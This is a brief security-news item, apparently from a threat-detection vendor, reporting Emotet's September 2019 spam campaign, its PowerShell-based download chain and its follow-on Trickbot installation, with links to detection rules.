Delaware, USA – September 17, 2019 – It took Emotet operators nearly a month to finally bring their monster back to life, remove bots of security firms from the infrastructure, and prepare a new spam campaign. Starting Monday morning, September 16, malicious emails began to appear in the United States, the United Kingdom, Italy, Germany, and Poland. Attackers are interested in government entities, companies, and individuals. According to Cofense Labs, about 66,000 unique emails were sent in the first wave of the spam campaign, and attackers continue to use both reply-chain style emails and regular phishing emails. Emails were sent from more than 3,300 systems, but only a small part of them was targeted at specific address lists, the rest used contact lists stolen from senders.
Malicious emails contain a Microsoft Word document with a script that uses PowerShell to download from compromised websites the latest version of Emotet malware, which most antivirus solutions cannot yet detect. The infection does not end there, and immediately after installation, Emotet downloads and installs the Trickbot trojan, which is often used for subsequent Ryuk cybergang attacks. Emotet botnet is back, and now the eventful summer can fade in the face of the gifts of autumn.
Content available on Threat Detection Marketplace to detect the malware:
Emotet Trojan detector (Sysmon) – https://tdm.socprime.com/tdm/info/1279/
TrickBot Malware Detector (Sysmon Behavior) (July 2019) – https://tdm.socprime.com/tdm/info/2335/
Trickbot Execution – https://tdm.socprime.com/tdm/info/2207/